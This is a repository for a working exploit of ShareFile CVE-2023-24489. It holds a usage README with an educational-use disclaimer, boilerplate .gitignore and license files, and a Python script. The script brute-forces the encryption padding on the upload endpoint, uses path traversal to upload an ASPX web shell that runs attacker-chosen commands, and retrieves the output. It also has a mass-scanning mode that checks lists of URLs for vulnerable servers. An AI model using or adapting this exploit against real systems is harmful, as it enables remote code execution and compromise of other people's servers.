├── README.md
├── .gitignore
├── LICENSE
└── cve.py


/README.md:
--------------------------------------------------------------------------------
 1 | # ShareFile RCE (CVE-2023-24489)
 2 | 
 3 | This is a Python script that exploits a remote code execution vulnerability in the ShareFile application (CVE-2023-24489). This vulnerability allows an attacker to execute arbitrary commands on the target system.
 4 | 
 5 | ## Usage
 6 | 
 7 | To use the script, follow the instructions below:
 8 | 
 9 | 1. Install the required dependencies:
10 |    ```bash
11 |    pip install requests
12 |    ```
13 | 
14 | 2. Run the script with the desired options:
15 | 
16 |    ```bash
17 |    python cve.py --host <target URL> [--windows | --linux] [--cmd <command>] [--mass-check <wordlist file>]
18 |    ```
19 | 
20 |    The available options are:
21 | 
22 |    - `--host`: Specifies the URL of the target to exploit.
23 |    - `--windows`: Specifies that the target system is running Windows.
24 |    - `--linux`: Specifies that the target system is running Linux.
25 |    - `--cmd`: Specifies the command to execute during exploitation (optional).
26 |    - `--mass-check`: Specifies the path to the wordlist file for mass checking (optional).
27 | 
28 |    Note: Either the `--host` option or the `--mass-check` option must be provided.
29 | 
30 | ## References
31 | [https://blog.assetnote.io/2023/07/04/citrix-sharefile-rce/](https://blog.assetnote.io/2023/07/04/citrix-sharefile-rce/)
32 | 
33 | ## Disclaimer
34 | 
35 | This script is provided for educational purposes only. You are responsible for using this script in compliance with applicable laws and regulations. The author assumes no responsibility for any unauthorized or malicious use of this script. You should only use this script on systems that you have proper authorization to access. Using this script on unauthorized systems is strictly prohibited and may result in legal consequences. Use it responsibly and at your own risk.


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | *$py.class
  5 | 
  6 | # C extensions
  7 | *.so
  8 | 
  9 | # Distribution / packaging
 10 | .Python
 11 | build/
 12 | develop-eggs/
 13 | dist/
 14 | downloads/
 15 | eggs/
 16 | .eggs/
 17 | lib/
 18 | lib64/
 19 | parts/
 20 | sdist/
 21 | var/
 22 | wheels/
 23 | share/python-wheels/
 24 | *.egg-info/
 25 | .installed.cfg
 26 | *.egg
 27 | MANIFEST
 28 | 
 29 | # PyInstaller
 30 | #  Usually these files are written by a python script from a template
 31 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 32 | *.manifest
 33 | *.spec
 34 | 
 35 | # Installer logs
 36 | pip-log.txt
 37 | pip-delete-this-directory.txt
 38 | 
 39 | # Unit test / coverage reports
 40 | htmlcov/
 41 | .tox/
 42 | .nox/
 43 | .coverage
 44 | .coverage.*
 45 | .cache
 46 | nosetests.xml
 47 | coverage.xml
 48 | *.cover
 49 | *.py,cover
 50 | .hypothesis/
 51 | .pytest_cache/
 52 | cover/
 53 | 
 54 | # Translations
 55 | *.mo
 56 | *.pot
 57 | 
 58 | # Django stuff:
 59 | *.log
 60 | local_settings.py
 61 | db.sqlite3
 62 | db.sqlite3-journal
 63 | 
 64 | # Flask stuff:
 65 | instance/
 66 | .webassets-cache
 67 | 
 68 | # Scrapy stuff:
 69 | .scrapy
 70 | 
 71 | # Sphinx documentation
 72 | docs/_build/
 73 | 
 74 | # PyBuilder
 75 | .pybuilder/
 76 | target/
 77 | 
 78 | # Jupyter Notebook
 79 | .ipynb_checkpoints
 80 | 
 81 | # IPython
 82 | profile_default/
 83 | ipython_config.py
 84 | 
 85 | # pyenv
 86 | #   For a library or package, you might want to ignore these files since the code is
 87 | #   intended to run in multiple environments; otherwise, check them in:
 88 | # .python-version
 89 | 
 90 | # pipenv
 91 | #   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
 92 | #   However, in case of collaboration, if having platform-specific dependencies or dependencies
 93 | #   having no cross-platform support, pipenv may install dependencies that don't work, or not
 94 | #   install all needed dependencies.
 95 | #Pipfile.lock
 96 | 
 97 | # poetry
 98 | #   Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control.
 99 | #   This is especially recommended for binary packages to ensure reproducibility, and is more
100 | #   commonly ignored for libraries.
101 | #   https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
102 | #poetry.lock
103 | 
104 | # pdm
105 | #   Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control.
106 | #pdm.lock
107 | #   pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it
108 | #   in version control.
109 | #   https://pdm.fming.dev/#use-with-ide
110 | .pdm.toml
111 | 
112 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm
113 | __pypackages__/
114 | 
115 | # Celery stuff
116 | celerybeat-schedule
117 | celerybeat.pid
118 | 
119 | # SageMath parsed files
120 | *.sage.py
121 | 
122 | # Environments
123 | .env
124 | .venv
125 | env/
126 | venv/
127 | ENV/
128 | env.bak/
129 | venv.bak/
130 | 
131 | # Spyder project settings
132 | .spyderproject
133 | .spyproject
134 | 
135 | # Rope project settings
136 | .ropeproject
137 | 
138 | # mkdocs documentation
139 | /site
140 | 
141 | # mypy
142 | .mypy_cache/
143 | .dmypy.json
144 | dmypy.json
145 | 
146 | # Pyre type checker
147 | .pyre/
148 | 
149 | # pytype static type analyzer
150 | .pytype/
151 | 
152 | # Cython debug symbols
153 | cython_debug/
154 | 
155 | # PyCharm
156 | #  JetBrains specific template is maintained in a separate JetBrains.gitignore that can
157 | #  be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
158 | #  and can be added to the global gitignore or merged into this file.  For a more nuclear
159 | #  option (not recommended) you can uncomment the following to ignore the entire idea folder.
160 | #.idea/
161 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
  1 | Creative Commons Legal Code
  2 | 
  3 | CC0 1.0 Universal
  4 | 
  5 |     CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE
  6 |     LEGAL SERVICES. DISTRIBUTION OF THIS DOCUMENT DOES NOT CREATE AN
  7 |     ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS
  8 |     INFORMATION ON AN "AS-IS" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES
  9 |     REGARDING THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS
 10 |     PROVIDED HEREUNDER, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING FROM
 11 |     THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS PROVIDED
 12 |     HEREUNDER.
 13 | 
 14 | Statement of Purpose
 15 | 
 16 | The laws of most jurisdictions throughout the world automatically confer
 17 | exclusive Copyright and Related Rights (defined below) upon the creator
 18 | and subsequent owner(s) (each and all, an "owner") of an original work of
 19 | authorship and/or a database (each, a "Work").
 20 | 
 21 | Certain owners wish to permanently relinquish those rights to a Work for
 22 | the purpose of contributing to a commons of creative, cultural and
 23 | scientific works ("Commons") that the public can reliably and without fear
 24 | of later claims of infringement build upon, modify, incorporate in other
 25 | works, reuse and redistribute as freely as possible in any form whatsoever
 26 | and for any purposes, including without limitation commercial purposes.
 27 | These owners may contribute to the Commons to promote the ideal of a free
 28 | culture and the further production of creative, cultural and scientific
 29 | works, or to gain reputation or greater distribution for their Work in
 30 | part through the use and efforts of others.
 31 | 
 32 | For these and/or other purposes and motivations, and without any
 33 | expectation of additional consideration or compensation, the person
 34 | associating CC0 with a Work (the "Affirmer"), to the extent that he or she
 35 | is an owner of Copyright and Related Rights in the Work, voluntarily
 36 | elects to apply CC0 to the Work and publicly distribute the Work under its
 37 | terms, with knowledge of his or her Copyright and Related Rights in the
 38 | Work and the meaning and intended legal effect of CC0 on those rights.
 39 | 
 40 | 1. Copyright and Related Rights. A Work made available under CC0 may be
 41 | protected by copyright and related or neighboring rights ("Copyright and
 42 | Related Rights"). Copyright and Related Rights include, but are not
 43 | limited to, the following:
 44 | 
 45 |   i. the right to reproduce, adapt, distribute, perform, display,
 46 |      communicate, and translate a Work;
 47 |  ii. moral rights retained by the original author(s) and/or performer(s);
 48 | iii. publicity and privacy rights pertaining to a person's image or
 49 |      likeness depicted in a Work;
 50 |  iv. rights protecting against unfair competition in regards to a Work,
 51 |      subject to the limitations in paragraph 4(a), below;
 52 |   v. rights protecting the extraction, dissemination, use and reuse of data
 53 |      in a Work;
 54 |  vi. database rights (such as those arising under Directive 96/9/EC of the
 55 |      European Parliament and of the Council of 11 March 1996 on the legal
 56 |      protection of databases, and under any national implementation
 57 |      thereof, including any amended or successor version of such
 58 |      directive); and
 59 | vii. other similar, equivalent or corresponding rights throughout the
 60 |      world based on applicable law or treaty, and any national
 61 |      implementations thereof.
 62 | 
 63 | 2. Waiver. To the greatest extent permitted by, but not in contravention
 64 | of, applicable law, Affirmer hereby overtly, fully, permanently,
 65 | irrevocably and unconditionally waives, abandons, and surrenders all of
 66 | Affirmer's Copyright and Related Rights and associated claims and causes
 67 | of action, whether now known or unknown (including existing as well as
 68 | future claims and causes of action), in the Work (i) in all territories
 69 | worldwide, (ii) for the maximum duration provided by applicable law or
 70 | treaty (including future time extensions), (iii) in any current or future
 71 | medium and for any number of copies, and (iv) for any purpose whatsoever,
 72 | including without limitation commercial, advertising or promotional
 73 | purposes (the "Waiver"). Affirmer makes the Waiver for the benefit of each
 74 | member of the public at large and to the detriment of Affirmer's heirs and
 75 | successors, fully intending that such Waiver shall not be subject to
 76 | revocation, rescission, cancellation, termination, or any other legal or
 77 | equitable action to disrupt the quiet enjoyment of the Work by the public
 78 | as contemplated by Affirmer's express Statement of Purpose.
 79 | 
 80 | 3. Public License Fallback. Should any part of the Waiver for any reason
 81 | be judged legally invalid or ineffective under applicable law, then the
 82 | Waiver shall be preserved to the maximum extent permitted taking into
 83 | account Affirmer's express Statement of Purpose. In addition, to the
 84 | extent the Waiver is so judged Affirmer hereby grants to each affected
 85 | person a royalty-free, non transferable, non sublicensable, non exclusive,
 86 | irrevocable and unconditional license to exercise Affirmer's Copyright and
 87 | Related Rights in the Work (i) in all territories worldwide, (ii) for the
 88 | maximum duration provided by applicable law or treaty (including future
 89 | time extensions), (iii) in any current or future medium and for any number
 90 | of copies, and (iv) for any purpose whatsoever, including without
 91 | limitation commercial, advertising or promotional purposes (the
 92 | "License"). The License shall be deemed effective as of the date CC0 was
 93 | applied by Affirmer to the Work. Should any part of the License for any
 94 | reason be judged legally invalid or ineffective under applicable law, such
 95 | partial invalidity or ineffectiveness shall not invalidate the remainder
 96 | of the License, and in such case Affirmer hereby affirms that he or she
 97 | will not (i) exercise any of his or her remaining Copyright and Related
 98 | Rights in the Work or (ii) assert any associated claims and causes of
 99 | action with respect to the Work, in either case contrary to Affirmer's
100 | express Statement of Purpose.
101 | 
102 | 4. Limitations and Disclaimers.
103 | 
104 |  a. No trademark or patent rights held by Affirmer are waived, abandoned,
105 |     surrendered, licensed or otherwise affected by this document.
106 |  b. Affirmer offers the Work as-is and makes no representations or
107 |     warranties of any kind concerning the Work, express, implied,
108 |     statutory or otherwise, including without limitation warranties of
109 |     title, merchantability, fitness for a particular purpose, non
110 |     infringement, or the absence of latent or other defects, accuracy, or
111 |     the present or absence of errors, whether or not discoverable, all to
112 |     the greatest extent permissible under applicable law.
113 |  c. Affirmer disclaims responsibility for clearing rights of other persons
114 |     that may apply to the Work or any use thereof, including without
115 |     limitation any person's Copyright and Related Rights in the Work.
116 |     Further, Affirmer disclaims responsibility for obtaining any necessary
117 |     consents, permissions or other rights required for any use of the
118 |     Work.
119 |  d. Affirmer understands and acknowledges that Creative Commons is not a
120 |     party to this document and has no duty or obligation with respect to
121 |     this CC0 or use of the Work.
122 | 


--------------------------------------------------------------------------------
/cve.py:
--------------------------------------------------------------------------------
  1 | import argparse
  2 | import requests
  3 | import base64
  4 | import urllib.parse
  5 | from requests.exceptions import SSLError, ConnectTimeout, ReadTimeout, ConnectionError
  6 | from urllib3.exceptions import InsecureRequestWarning
  7 | 
  8 | def exploit(target, cmd="whoami", is_windows=True):
  9 |     requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 10 |     valid_padding = None
 11 |     print("[+] Finding correct padding")
 12 | 
 13 |     session = requests.Session()
 14 |     adapter = requests.adapters.HTTPAdapter(pool_connections=10, pool_maxsize=100)
 15 |     session.mount('http://', adapter)
 16 |     session.mount('https://', adapter)
 17 | 
 18 |     for i in range(0, 256):
 19 |         payload = [
 20 |             # block 0
 21 |             b'\x41', b'\x41', b'\x41', b'\x41',
 22 |             b'\x41', b'\x41', b'\x41', b'\x41',
 23 |             b'\x41', b'\x41', b'\x41', b'\x41',
 24 |             b'\x41', b'\x41', b'\x41', i.to_bytes(1, byteorder='little'),
 25 | 
 26 |             # block 1
 27 |             b'\x41', b'\x41', b'\x41', b'\x41',
 28 |             b'\x41', b'\x41', b'\x41', b'\x41',
 29 |             b'\x41', b'\x41', b'\x41', b'\x41',
 30 |             b'\x41', b'\x41', b'\x41', b'\x41'
 31 |         ]
 32 |         payload = b''.join(payload)
 33 |         payload = base64.b64encode(payload)
 34 |         payload = urllib.parse.quote(payload, safe='')
 35 | 
 36 |         url = f'{target}/documentum/upload.aspx?parentid={payload}&uploadid=x'
 37 |         try:
 38 |             r = session.get(url, timeout=5, verify=False)
 39 |         except ConnectTimeout:
 40 |             print('[-] Connection Timeout Error')
 41 |             continue
 42 |         except ReadTimeout:
 43 |             print('[-] Read Timeout Error')
 44 |             continue
 45 |         except SSLError as e:
 46 |             if 'unsafe legacy renegotiation disabled' in str(e):
 47 |                 print('[-] Unsafe Legacy Renegotiation Disabled')
 48 |             elif 'TLS/SSL connection has been closed' in str(e):
 49 |                 print('[-] SSL Connection Closed (EOF)')
 50 |             elif 'certificate verify failed' in str(e):
 51 |                 print('[-] SSL Certificate Error')
 52 |             else:
 53 |                 print(e)
 54 |             continue
 55 |         except ConnectionError as e:
 56 |             print('[-] Connection Error:', e)
 57 |             continue
 58 |         if r.status_code == 200:
 59 |             if 'Invalid request method - GET' in r.text:
 60 |                 valid_padding = payload
 61 |                 print(f'Valid padding:   {payload}')
 62 |                 break
 63 | 
 64 |     if valid_padding:
 65 |         parentid = valid_padding
 66 |         filename = 'real.aspx'
 67 |         if is_windows:
 68 |             data = f'''<%@ Page Language="C#" Debug="true" Trace="false" %>
 69 |             <%@ Import Namespace="System.Diagnostics" %>
 70 |             <%@ Import Namespace="System.IO" %>
 71 |             <script Language="c#" runat="server">
 72 |             void Page_Load(object sender, EventArgs e)
 73 |             {{
 74 |                 Response.Write("<pre>");
 75 |                 Response.Write(Server.HtmlEncode(ExcuteCmd()));
 76 |                 Response.Write("</pre>");
 77 |             }}
 78 |             string ExcuteCmd()
 79 |             {{
 80 |                 ProcessStartInfo psi = new ProcessStartInfo();
 81 |                 psi.FileName = "cmd.exe";
 82 |                 psi.Arguments = "/c {cmd}";
 83 |                 psi.RedirectStandardOutput = true;
 84 |                 psi.UseShellExecute = false;
 85 |                 Process p = Process.Start(psi);
 86 |                 StreamReader stmrdr = p.StandardOutput;
 87 |                 string s = stmrdr.ReadToEnd();
 88 |                 stmrdr.Close();
 89 |                 return s;
 90 |             }}
 91 |             </script>'''
 92 |         else:
 93 |             data = f'''<%@ Page Language="C#" Debug="true" Trace="false" %>
 94 |             <%@ Import Namespace="System.Diagnostics" %>
 95 |             <%@ Import Namespace="System.IO" %>
 96 |             <script Language="c#" runat="server">
 97 |             void Page_Load(object sender, EventArgs e)
 98 |             {{
 99 |                 Response.Write("<pre>");
100 |                 Response.Write(Server.HtmlEncode(ExcuteCmd()));
101 |                 Response.Write("</pre>");
102 |             }}
103 |             string ExcuteCmd()
104 |             {{
105 |                 ProcessStartInfo psi = new ProcessStartInfo();
106 |                 psi.FileName = "/usr/bin/mono";
107 |                 psi.Arguments = "{cmd}";
108 |                 psi.RedirectStandardOutput = true;
109 |                 psi.UseShellExecute = false;
110 |                 Process p = Process.Start(psi);
111 |                 StreamReader stmrdr = p.StandardOutput;
112 |                 string s = stmrdr.ReadToEnd();
113 |                 stmrdr.Close();
114 |                 return s;
115 |             }}
116 |             </script>'''
117 | 
118 |         url = f'{target}/documentum/upload.aspx?parentid={parentid}&raw=1&unzip=on&uploadid={filename}\..\..\..\cifs&filename={filename}'
119 |         headers = {'Content-Type': 'text/html; charset=utf-8'}
120 |         response = session.post(url, data=data, headers=headers, verify=False)
121 |         if response.status_code == 200:
122 |             print(response.text)
123 |             get_url = f'{target}/cifs/{filename}'
124 |             try:
125 |                 get_response = session.get(get_url, verify=False)
126 |                 if get_response.status_code == 200:
127 |                     print(get_response.text)
128 |                 else:
129 |                     print(f'[-] Error retrieving the result: {get_response.status_code}')
130 |             except (SSLError, ConnectTimeout, ReadTimeout, ConnectionError) as e:
131 |                 print(f'[-] Error retrieving the result: {str(e)}')
132 |     else:
133 |         print('[-] No valid padding found.')
134 | 
135 | def mass_check(filename):
136 |     requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
137 |     with open(filename, 'r') as wordlist_file:
138 |         session = requests.Session()
139 |         adapter = requests.adapters.HTTPAdapter(pool_connections=10, pool_maxsize=100)
140 |         session.mount('http://', adapter)
141 |         session.mount('https://', adapter)
142 | 
143 |         for line in wordlist_file:
144 |             url = line.strip()
145 |             payload_url = f'{url}/documentum/upload.aspx?parentid=QDDDD&uploadid=x'
146 |             try:
147 |                 response = session.get(payload_url, timeout=5)
148 | 
149 |                 if response.status_code == 200:
150 |                     print(f'[+] Potentially vulnerable URL: {url}')
151 |                 else:
152 |                     print(f'[-] Not vulnerable: {url}')
153 |             except SSLError as e:
154 |                 if 'unsafe legacy renegotiation disabled' in str(e):
155 |                     print('[-] Unsafe Legacy Renegotiation Disabled')
156 |                 elif 'TLS/SSL connection has been closed' in str(e):
157 |                     print('[-] SSL Connection Closed (EOF)')
158 |                 elif 'certificate verify failed' in str(e):
159 |                     print('[-] SSL Certificate Error')
160 |                 else:
161 |                     print(e)
162 |             except ConnectionError as e:
163 |                 print('[-] Connection Error:', e)
164 |             except ConnectTimeout:
165 |                 print('[-] Connection Timeout Error')
166 |             except ReadTimeout:
167 |                 print('[-] Read Timeout Error')
168 | 
169 | if __name__ == '__main__':
170 |     print('''ShareFile RCE (CVE-2023-24489) 
171 | 
172 | █▄▄ █▄█ ▀   ▄▀█ █▀▄ █░█ █▄▀ █▀█
173 | █▄█ ░█░ ▄   █▀█ █▄▀ █▀█ █░█ █▀▄
174 | ''')
175 |     parser = argparse.ArgumentParser(description='Exploit or mass check vulnerable URLs')
176 |     parser.add_argument('--host', help='URL to exploit')
177 |     parser.add_argument('--windows', action='store_true', help='Specify if the target is Windows')
178 |     parser.add_argument('--linux', action='store_true', help='Specify if the target is Linux')
179 |     parser.add_argument('--cmd', help='Command to execute during exploitation')
180 |     parser.add_argument('--mass-check', help='Path to the wordlist file for mass checking')
181 | 
182 |     args = parser.parse_args()
183 | 
184 |     if args.host:
185 |         if args.windows:
186 |             exploit(args.host, args.cmd, is_windows=True)
187 |         elif args.linux:
188 |             exploit(args.host, args.cmd, is_windows=False)
189 |         else:
190 |             print('Please specify either --windows or --linux argument.')
191 |     elif args.mass_check:
192 |         mass_check(args.mass_check)
193 |     else:
194 |         print('Please provide either --host or --mass-check argument.')


--------------------------------------------------------------------------------